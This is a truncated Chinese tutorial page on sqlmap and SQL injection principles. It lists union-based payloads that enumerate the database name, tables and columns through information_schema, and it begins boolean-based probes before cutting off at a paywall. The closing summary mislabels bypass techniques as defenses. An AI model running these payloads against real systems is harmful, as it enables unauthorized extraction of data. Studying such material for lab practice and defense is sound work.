SqlMap实战
原理
union注入
select * from security.users;
select * from users where id=1 order by 3;
select * from users where id=1 union select 1,(database()),3;
user(),version()
select * from users where id=1 union select 1,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),3;
select * from users where id=1 union select 1,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘user’ limit 0,1),3;
select * from users where id=1 union select 1,(select column_name from information_schema.columns where table_schema =(select database()) and table_name =(select table_name from information_schema.tables where table_schema =(select database()) limit 0,1) limit 0,1),3;
boolean注入
select * from users where id=1 and length(database())>=1 ;
select * from users where id=1 and substr(database()
本文深入探讨了SqlMap的工作原理,包括Union注入、Boolean注入、报错注入和时间注入等方法。通过示例展示了如何利用SqlMap进行数据库信息探测,如获取数据库名、表名、列名等。同时,文章还提到了常见的SQL注入防范措施,如宽字节注入、XFF注入和内联注释绕过等。
最低0.47元/天 解锁文章
1506
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
